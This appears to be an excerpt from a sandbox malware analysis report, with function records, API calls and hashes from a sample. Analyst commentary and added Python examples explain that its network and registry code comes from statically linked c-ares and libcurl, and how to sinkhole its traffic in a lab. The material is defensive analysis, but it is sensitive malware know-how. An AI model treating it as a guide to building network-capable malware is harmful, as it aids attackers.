                                                 • Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID: CloseOpenQueryValue
                                                • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos
                                                • API String ID: 3677997916-615551945
                                                • Opcode ID: d2010e7d0c0e95569f905c3c35635a7d0b5626b98c2d6fa804c3d30e3dadc06c
                                                • Instruction ID: 429a40a5bd210a51fb0ac25eb084281daae17da9c8201b2dd877410b0e870ec2
                                                • Opcode Fuzzy Hash: d2010e7d0c0e95569f905c3c35635a7d0b5626b98c2d6fa804c3d30e3dadc06c
                                                • Instruction Fuzzy Hash: 1132B4F1900601ABE711BB22AC42A6F76D4AF4430CF08497AFD0D96362F729ED15C79B
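The function at 00489740 above, together with the DhcpDomain / PrimaryDNSSuffix / SearchList record earlier on this page, is the Windows configuration discovery of the c-ares resolver that is statically linked into the sample (the CARES_HOSTS environment variable, the DatabasePath value and the truncated "\hos" string are that library's hosts-file lookup). This is the resolver locating the hosts file, not a sandbox or anti-analysis registry check, and the call arguments in the report are the check: 80000002 is HKEY_LOCAL_MACHINE, 00020019 is KEY_READ, and the 00000104 buffer length is MAX_PATH (260). The following Python is an added example, not code from the sample, from c-ares or from Joe Sandbox; it reproduces the lookup order in a form that runs offline. The registry stub and hosts-file text are constructed, and the expansion of %SystemRoot% is an assumption (DatabasePath is a REG_EXPAND_SZ value on a stock system, but the report's API list for this function does not show the expansion call).

```python
import ipaddress
from typing import Callable, Dict, List, Optional

# Key and value names exactly as they appear in the report's API arguments.
TCPIP_PARAMS = r"System\CurrentControlSet\Services\Tcpip\Parameters"
DATABASE_PATH_VALUE = "DatabasePath"
HOSTS_SUFFIX = r"\hosts"


def resolve_hosts_path(env: Dict[str, str],
                       reg_query: Callable[[str, str], Optional[str]]) -> Optional[str]:
    """Return the hosts file the resolver will read, in the order the function
    at 0x489740 applies: the CARES_HOSTS environment override wins; otherwise
    the DatabasePath value under the Tcpip Parameters key (HKLM, KEY_READ)
    plus a trailing 'hosts'. reg_query stands in for RegQueryValueExA."""
    override = env.get("CARES_HOSTS")
    if override:
        return override
    db_path = reg_query(TCPIP_PARAMS, DATABASE_PATH_VALUE)
    if not db_path:
        return None
    # Assumption: expand %NAME% tokens from the supplied environment, as a
    # REG_EXPAND_SZ DatabasePath (%SystemRoot%\System32\drivers\etc) needs.
    for name, value in env.items():
        db_path = db_path.replace(f"%{name}%", value)
    return db_path.rstrip("\\") + HOSTS_SUFFIX


def parse_hosts(text: str) -> Dict[str, List[str]]:
    """Parse hosts-file text into {lower-case name: [addresses]}. Text after
    '#' is a comment; lines whose first field is not an IP address are
    skipped rather than treated as an error, as a resolver would."""
    table: Dict[str, List[str]] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        try:
            addr = ipaddress.ip_address(fields[0])
        except ValueError:
            continue
        for name in fields[1:]:
            table.setdefault(name.lower(), []).append(str(addr))
    return table


def lookup(table: Dict[str, List[str]], name: str) -> List[str]:
    """Hosts-file answer for a name (case-insensitive); empty if absent."""
    return table.get(name.lower(), [])


# Constructed registry stub returning what a stock Windows install holds.
FAKE_REGISTRY = {
    (TCPIP_PARAMS, DATABASE_PATH_VALUE): r"%SystemRoot%\System32\drivers\etc",
}


def fake_reg_query(key: str, value: str) -> Optional[str]:
    return FAKE_REGISTRY.get((key, value))


# Constructed hosts file for the demo; not taken from the sample or the sandbox.
SAMPLE_HOSTS = """\
127.0.0.1       localhost
::1             localhost ip6-localhost
# Analyst sinkhole: point the sample's update host at a local listener.
10.0.0.5        update.example.test   # trailing comment is ignored
not-an-address  bogus.example.test
"""


def demo() -> Dict[str, object]:
    """Resolve the path both ways and answer a name from the hosts table."""
    env = {"SystemRoot": r"C:\Windows"}
    default_path = resolve_hosts_path(env, fake_reg_query)
    override_path = resolve_hosts_path({**env, "CARES_HOSTS": r"D:\lab\hosts"},
                                       fake_reg_query)
    table = parse_hosts(SAMPLE_HOSTS)
    return {
        "default_path": default_path,
        "override_path": override_path,
        "sinkholed": lookup(table, "UPDATE.example.test"),
        "localhost": lookup(table, "localhost"),
        "entries": len(table),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The practical use in a lab is the override path: because this resolver consults the hosts file before DNS and honours CARES_HOSTS, the sample's name resolution can be redirected to a local listener by editing the file at the resolved path or by setting the variable in the sample's environment, without touching the sandbox's DNS.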

                                                 Control-flow Graph
                                                 • Graph image (legend: Executed / Not Executed): basic blocks 003F8B50-003F8F06; API nodes connect, SleepEx
                                                APIs
                                                • connect.WS2_32(?,?,00000001), ref: 003F8C30
                                                • SleepEx.KERNELBASE(00000000,00000000), ref: 003F8CF3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                 • Associated: 00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1490873560.0000000000A97000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1490873560.0000000000A99000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1491659045.0000000000A9E000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID: Sleepconnect
                                                • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                • API String ID: 238548546-879669977
                                                • Opcode ID: 061c543ada707d08811388f6eee3bded43290217ed06a128916daf9fb5f06cfc
                                                • Instruction ID: 9531e2ee062d65ee6d1a641e90482c54f915689de83cbe4a10eeecc6a91aeeba
                                                • Opcode Fuzzy Hash: 061c543ada707d08811388f6eee3bded43290217ed06a128916daf9fb5f06cfc
                                                • Instruction Fuzzy Hash: 76B1CF7060430AAFDB1ACF24C985BB7B7E4AF55318F048929FA594B2D2DB74EC48C761
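The setsockopt record at 003FA832 and the connect/SleepEx record at 003F8B50 both carry cf-socket.c log strings, which place them in the connection-filter code of a statically linked libcurl: "Local port: %hu" and "Bind to local port %d failed, trying next" are the local-port-range bind loop, "Trying %s:%d..." precedes a non-blocking connect, and "not connected yet" / "connected" are the two outcomes of the later poll. The sample is therefore driving TCP_NODELAY, the bind retry and the non-blocking connect through libcurl rather than through hand-written socket code, which matters when writing detections: those format strings fingerprint the library, not the malware. The Python below is an added example, not code from libcurl, the sample or Joe Sandbox; it performs the same sequence against a loopback listener so the log lines can be matched to the report's strings. The listener, the deliberately occupied port and the port range are constructed for the demo.

```python
import errno
import os
import select
import socket
from typing import Callable, Dict, List, Optional, Tuple

# Return codes of a non-blocking connect() while the handshake is still in
# flight: EINPROGRESS on POSIX, WSAEWOULDBLOCK (10035) on Winsock.
_IN_PROGRESS = {errno.EINPROGRESS, errno.EWOULDBLOCK, errno.EAGAIN,
                getattr(errno, "WSAEWOULDBLOCK", 10035)}


def open_and_connect(remote: Tuple[str, int],
                     local_port_range: Optional[Tuple[int, int]] = None,
                     timeout: float = 2.0,
                     log: Callable[[str], None] = print) -> socket.socket:
    """socket(); TCP_NODELAY; bind to the first free local port in the range,
    logging every miss; non-blocking connect(); then wait for writability
    and read SO_ERROR to learn whether the connect succeeded. The log lines
    mirror the cf-socket.c strings listed in the report."""
    host, port = remote
    family = socket.AF_INET6 if ":" in host else socket.AF_INET
    s = socket.socket(family, socket.SOCK_STREAM)
    try:
        try:
            s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
        except OSError as exc:
            log(f"Could not set TCP_NODELAY: {exc.strerror}")
        if local_port_range:
            lo, hi = local_port_range
            wildcard = "::" if family == socket.AF_INET6 else "0.0.0.0"
            for lport in range(lo, hi + 1):
                try:
                    s.bind((wildcard, lport))
                    log(f"Local port: {lport}")
                    break
                except OSError as exc:
                    log(f"Bind to local port {lport} failed, trying next ({exc.errno})")
            else:
                raise OSError(errno.EADDRINUSE, "no free local port in range")
        s.setblocking(False)
        log(f"Trying {host}:{port}...")
        rc = s.connect_ex(remote)
        if rc == 0:
            log("connected")
        elif rc in _IN_PROGRESS:
            log("not connected yet")
            _, writable, _ = select.select([], [s], [], timeout)
            if not writable:
                raise TimeoutError(f"connect to {host} port {port} timed out")
            err = s.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR)
            if err:
                raise OSError(err, f"connect to {host} port {port} failed: {os.strerror(err)}")
            log("connected")
        else:
            raise OSError(rc, f"connect to {host} port {port} failed: {os.strerror(rc)}")
        s.setblocking(True)
        return s
    except BaseException:
        s.close()
        raise


def demo_loopback() -> Dict[str, object]:
    """Constructed setup: a listener on 127.0.0.1 and a second socket that
    occupies the first port of the requested range, forcing one bind miss."""
    messages: List[str] = []
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    blocker = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        listener.bind(("127.0.0.1", 0))
        listener.listen(1)
        blocker.bind(("127.0.0.1", 0))
        blocked = blocker.getsockname()[1]
        client = open_and_connect(listener.getsockname(),
                                  local_port_range=(blocked, blocked + 50),
                                  log=messages.append)
        try:
            server_side, peer = listener.accept()
            server_side.close()
            local_port = client.getsockname()[1]
        finally:
            client.close()
        return {"blocked_port": blocked, "local_port": local_port,
                "peer_port": peer[1], "log": messages}
    finally:
        blocker.close()
        listener.close()


if __name__ == "__main__":
    result = demo_loopback()
    for line in result["log"]:
        print(line)
    print(f"server saw source port {result['peer_port']}")
```

The wait step is the part a sandbox trace shows as repeated sleeps: libcurl returns from the connect attempt immediately and the multi loop polls until the socket becomes writable, which is why SleepEx sits in the same function as connect in the report.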

                                                 Control-flow Graph
                                                 • Graph image (legend: Executed / Not Executed): basic blocks 003C2F17-003C31D6; API nodes RegOpenKeyExA, RegEnumKeyExA, RegQueryValueExA, RegCloseKey
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                 • Associated: 00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1490873560.0000000000A97000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1490873560.0000000000A99000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1491659045.0000000000A9E000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID: EnumOpen
                                                • String ID: d
                                                • API String ID: 3231578192-2564639436
                                                • Opcode ID: 97ddeddc2625aa5812c746a1e4e0bec520c61de86c92aba5b4c89b7cd4b2f423
                                                • Instruction ID: b98cf5dfb6039da6dc98c7a74e53b316fb75d519af4ed1ec84b2f13a48fe9b01
                                                • Opcode Fuzzy Hash: 97ddeddc2625aa5812c746a1e4e0bec520c61de86c92aba5b4c89b7cd4b2f423
                                                • Instruction Fuzzy Hash: CC7181B49043199FDB50EF69D58879EBBF0BF84308F10886DE89897311D7749A898F92

                                                 Control-flow Graph
                                                 • Graph image (legend: Executed / Not Executed): basic blocks 003C76A0-003C7762; API node send
                                                APIs
                                                • send.WS2_32(multi.c,?,?,?,N=<,00000000,?,?,003D07BF), ref: 003C76EA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                 • Associated: 00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1490873560.0000000000A97000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1490873560.0000000000A99000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1491659045.0000000000A9E000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID: send
                                                • String ID: LIMIT %s:%d %s reached memlimit$N=<$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                • API String ID: 2809346765-2027368032
                                                • Opcode ID: 333e2ead38cac446e051ab1381a61f951015a755a54e44145806e799df3cd1d0
                                                • Instruction ID: 2b592876dfc0ca2a400c18f71dc3e8350aaab91872d978283748776d83d64aa0
                                                • Opcode Fuzzy Hash: 333e2ead38cac446e051ab1381a61f951015a755a54e44145806e799df3cd1d0
                                                • Instruction Fuzzy Hash: 44113DB5F193147BD121A75A9C4AF27776CDBC2B6CF05091CBC0497242D6619D018BB1

                                                Control-flow Graph (graph rendering omitted; entry block 3f9290, calls WSAIoctl and setsockopt, call sites listed under APIs)
                                                APIs
                                                • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 003F935D
                                                • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 003F9389
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID: Ioctlsetsockopt
                                                • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                • API String ID: 1903391676-2691795271
                                                • Opcode ID: 69e22b4c7721b4b05b90d55fb67736647a9eef1485404d3d5a78cbd91d6c3a18
                                                • Instruction ID: c4a9ae4de9d53716c8d4d019bd1f5978aab11706766e8222c214350661e37a35
                                                • Opcode Fuzzy Hash: 69e22b4c7721b4b05b90d55fb67736647a9eef1485404d3d5a78cbd91d6c3a18
                                                • Instruction Fuzzy Hash: EA51E575A00309AFD712DF25C881FBA77A5FF84314F15852AFE489B282EB31E951CB51

                                                Control-flow Graph (graph rendering omitted; entry block 3c7770, calls recv)
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID: recv
                                                • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                • API String ID: 1507349165-640788491
                                                • Opcode ID: 1ac98d430172417943b38d9d1c84cb66c8838a6355e32f478b12eb5c7c1e4dde
                                                • Instruction ID: d33ef53256f84eec3550443b297b9a7312e2f8be9abe6a4ab9510e52757ccc65
                                                • Opcode Fuzzy Hash: 1ac98d430172417943b38d9d1c84cb66c8838a6355e32f478b12eb5c7c1e4dde
                                                • Instruction Fuzzy Hash: 4C1127B5A093187BD521AB559C4EF377B6CDBC6B68F45092DBC08D3292DA219C018BF2

                                                Control-flow Graph (graph rendering omitted; entry block 3c75e0, calls socket)
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID: socket
                                                • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                • API String ID: 98920635-842387772
                                                • Opcode ID: d01c966ee674d13826f74972487be5d32fb6dd1a0b90b62414611b04ed810bc1
                                                • Instruction ID: e777e6cd0d73a326603589ae3843260922df6a45dcb0cf11652042760021a3d4
                                                • Opcode Fuzzy Hash: d01c966ee674d13826f74972487be5d32fb6dd1a0b90b62414611b04ed810bc1
                                                • Instruction Fuzzy Hash: 85118C76F0121137DA11976DAC1AF4B7BA8DFC1738F050928F810D62E2D7118C60CBE1

                                                Control-flow Graph (graph rendering omitted; entry block 3fa150, calls getsockname, call site listed under APIs)
                                                APIs
                                                • getsockname.WS2_32(?,?,00000080), ref: 003FA1C7
                                                Strings
                                                • getsockname() failed with errno %d: %s, xrefs: 003FA1F0
                                                • ssloc inet_ntop() failed with errno %d: %s, xrefs: 003FA23B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID: getsockname
                                                • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                • API String ID: 3358416759-2605427207
                                                • Opcode ID: 9dfe6cfb2857cacbfbfc3096fef68710d1d24eba8bfa15fdccaed3bb3d7bd402
                                                • Instruction ID: b9a898bcf63c4d5cd86032fb89f866d4329cf5a39ad1246d87337307f6308a48
                                                • Opcode Fuzzy Hash: 9dfe6cfb2857cacbfbfc3096fef68710d1d24eba8bfa15fdccaed3bb3d7bd402
                                                • Instruction Fuzzy Hash: FD212B71908684BAE6229718DC46FF773BCEFC1328F040615FA8853152FF32598587E2

                                                Control-flow Graph (graph rendering omitted; entry block 3dd5e0, calls WSAStartup, call site listed under APIs)
                                                APIs
                                                • WSAStartup.WS2_32(00000202), ref: 003DD65A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID: Startup
                                                • String ID: if_nametoindex$iphlpapi.dll
                                                • API String ID: 724789610-3097795196
                                                • Opcode ID: a5b641bc2a7a3211b0ec9eab9b5a987b7be7e7b5f199432dd825d5969d5436bc
                                                • Instruction ID: efb59f81f8094d95207a8ea7a898ada8e83ebf67fd433d085c6a45839bed1ac6
                                                • Opcode Fuzzy Hash: a5b641bc2a7a3211b0ec9eab9b5a987b7be7e7b5f199432dd825d5969d5436bc
                                                • Instruction Fuzzy Hash: 12012BE1E8438156EF12AB38BD1B72635A05B5230CF86197AD888952D2FB29C959C2D3

                                                Control-flow Graph (graph rendering omitted; entry block 48aa30, calls socket, ioctlsocket and connect, call sites listed under APIs)
                                                APIs
                                                • socket.WS2_32(FFFFFFFF,?,00000000), ref: 0048AB9B
                                                • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0048ABE3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID: ioctlsocketsocket
                                                • String ID:
                                                • API String ID: 416004797-0
                                                • Opcode ID: 5cc151660f792164a7dbb04709b954106c8333f0466fb8bdfbd8cb493368b810
                                                • Instruction ID: a7605b1a23f4f375e31d8baa8635b5bb5c5f823595ae93bb3703daea18ba8824
                                                • Opcode Fuzzy Hash: 5cc151660f792164a7dbb04709b954106c8333f0466fb8bdfbd8cb493368b810
                                                • Instruction Fuzzy Hash: ECE1CF706043019BEB20DF14C885B6B77E5AF89304F044E2FF9988B391E7B9E864CB56
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490873560.0000000000A97000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490873560.0000000000A99000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491659045.0000000000A9E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmp
                                                Similarity
                                                • API ID: closesocket
                                                • String ID: FD %s:%d sclose(%d)
                                                • API String ID: 2781271927-3116021458
                                                APIs
                                                • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,0048B29E,?,00000000,?,?), ref: 0048B0B9
                                                • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00473C41,00000000), ref: 0048B0C1
                                                Similarity
                                                • API ID: ErrorLastconnect
                                                • String ID:
                                                • API String ID: 374722065-0
                                                APIs
                                                • gethostname.WS2_32(00000000,00000040), ref: 00474AA5
                                                Similarity
                                                • API ID: gethostname
                                                • String ID:
                                                • API String ID: 144339138-0
                                                APIs
                                                • getsockname.WS2_32(?,?,00000080), ref: 0048AFD1
                                                Similarity
                                                • API ID: getsockname
                                                • String ID:
                                                • API String ID: 3358416759-0
                                                APIs
                                                • send.WS2_32(?,?,?,00000000,00000000,?), ref: 0048A97F
                                                Similarity
                                                • API ID: send
                                                • String ID:
                                                • API String ID: 2809346765-0
                                                APIs
                                                • socket.WS2_32(?,0048B280,00000000,-00000001,00000000,0048B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 0048AF66
                                                Similarity
                                                • API ID: socket
                                                • String ID:
                                                • API String ID: 98920635-0
                                                APIs
                                                • closesocket.WS2_32(?,00489422,?,?,?,?,?,?,?,?,?,?,?,w3G,00854C60,00000000), ref: 0048B04C
                                                Similarity
                                                • API ID: closesocket
                                                • String ID:
                                                • API String ID: 2781271927-0
                                                APIs
                                                • ioctlsocket.WS2_32(?,8004667E,?,?,003FAF56,?,00000001), ref: 004267FB
                                                Similarity
                                                • API ID: ioctlsocket
                                                • String ID:
                                                • API String ID: 3577187118-0
                                                APIs
                                                Similarity
                                                • API ID: CloseHandle
                                                • String ID:
                                                • API String ID: 2962429428-0
                                                • Opcode ID: f83720b8ec4b6fa924622ac6e3527d2770ac4e52b183a88983c52200aeaf210d
                                                • Instruction ID: dcbe91ce231222fbd5800fa87f0ed2b3d19bec8ab4c2a5a438cb0257b349aa42
                                                • Opcode Fuzzy Hash: f83720b8ec4b6fa924622ac6e3527d2770ac4e52b183a88983c52200aeaf210d
                                                • Instruction Fuzzy Hash: 9E3193B49093189BCB10EFB8C58969EBBF0FF44304F01896DE898E7241EB749A44CF52
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID: Sleep
                                                • String ID:
                                                • API String ID: 3472027048-0
                                                • Opcode ID: 8f9ae45a0fc8cc6517cb2e4982f3407f65c0b0e20c520aa866686a7579a20a2d
                                                • Instruction ID: 50a0496ab36bfcbe501fa23efdb831f18fbdb28e5f9697c76ceb3c4cc774f3ee
                                                • Opcode Fuzzy Hash: 8f9ae45a0fc8cc6517cb2e4982f3407f65c0b0e20c520aa866686a7579a20a2d
                                                • Instruction Fuzzy Hash: 28C04CE4C1574446D700BA38C58611D79E47745204FC11A68998496195F768D3188657
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: #HttpOnly_$%s cookie %s="%s" for domain %s, path %s, expire %lld$;=$;$=$Added$FALSE$Replaced$TRUE$__Host-$__Secure-$cookie '%s' dropped, domain '%s' must not set cookies for '%s'$cookie '%s' for domain '%s' dropped, would overlay an existing cookie$cookie contains TAB, dropping$cookie.c$domain$expires$httponly$invalid octets in name/value, cookie dropped$libpsl problem, rejecting cookie for satety$max-age$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version
                                                • API String ID: 0-1371176463
